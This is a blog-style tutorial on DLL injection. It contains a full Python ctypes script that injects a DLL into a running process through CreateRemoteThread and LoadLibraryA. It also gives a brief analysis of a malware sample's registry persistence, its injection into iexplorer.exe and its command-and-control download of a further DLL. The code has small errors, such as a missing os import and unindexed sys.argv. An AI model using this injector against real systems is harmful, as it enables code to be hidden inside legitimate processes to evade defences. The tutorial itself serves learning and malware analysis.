There are a lot of ways to alter a process’s execution path , Oh aren’t they many!- in this article , we’ll tackle one of the most commonly used techniques , DLL injection , We’ll start by looking at it’s concept and how to implement it your self ; then see it work in action in a real malware. Dll injection is a very common technique , where you can inject a dll into an executing binary , hence having it’s privileges would be great to evade a firewall for example.
Overall there are two types of injection -whether it’s code or dll injection- Static injection is when you change the binary it self before executing Dynamic injection is when you change the behaviour during execution
In dymanic dll injection we force the binary to load the dll by executing kernel32.LoadLibraryA in a new remote thread we’ll create there.
Now off to code so you get the picture :
from ctypes import * import sys #usage DllInjection.py #refer to MSDN if you don't know what these flags are PG_RW= 0x04 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM=( 0x1000 | 0x2000 ) #load kernel32 library kernel32=windll.kernel32 pid=sys.argv dll_path=sys.argv dll_len=len(dll_path) #check if the dll exists if os.path.isfile(dll_path)==false: print "Dll not found , recheck the address" sys.exit(0) #open target process h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) ) #if failed , get out of here if not h_process: print "Failed to get handle to dll" sys.exit(0) #allocate memory in target process to put loadLibraryA argument ( our dll ) arg_address = kernel32.VirtualAllocEx( h_process, 0, dll_len, VIRTUAL_MEM,PG_RW) #write the argument (again the path to our dll) in the process memory we just allocated. written = c_int(0) kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len,byref(written)) #get LoadLibraryA address h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll") h_loadlib = kernel32.GetProcAddress( h_kernel32,"LoadLibraryA") #Create a new remote thread , executing loadLibrary with the argument we wrote above thread_id = c_ulong(0) if not kernel32.CreateRemoteThread( h_process,None,0,h_loadlib,arg_address ,0,byref(thread_id)): print "Failed to create thread" sys.exit(0) print "DLL injection success! ... Thread created with id 0x%08x" %thread_id.value
Now that you get the concept let’s take a look at dll injection in action
MD5 : E276F2C49D194DEF764A383482ECBD03
the point of the article is not to do full analysis so I’ll skip a lot of details and focus mainly on the dll injection part .
just to put you in the picture , in the first stage the malware creates 3 files ; shell32.dll , 123.dll , 123.info
it’ll write the path to the binary in 123.info then copy some data into shell32.dll , edit the registry by writing writes the value shell32.dll to it in order to get loaded on system boot by InProcServer32.
so now you can conclude that a system reboot will come next so that shell32.dll would come to life!
And that ends the second stage , That leaves us with shell32.dll to analyze once it gets loaded at explorer.exe , the dll will inject it self in iexplorer.exe
This looks familiar right ? Once the remote thread in iexplorer.exe executes the malicious activity will start .
The thread will use send and recv functions form WS2_32.dll to commuincate with CC at 220.127.116.11 the data received will be saved on disk as 123.dll and 123.complite ; lastly it’ll close the socket and create a new thread executing 123.dll. Which will probably be a backdoor.
I chose not to go any further because the point of the article was to show you the concept of dll injection in a real life scenario , I may continue the analysis in a later article until then , Good luck!
Code/Binaries – Archive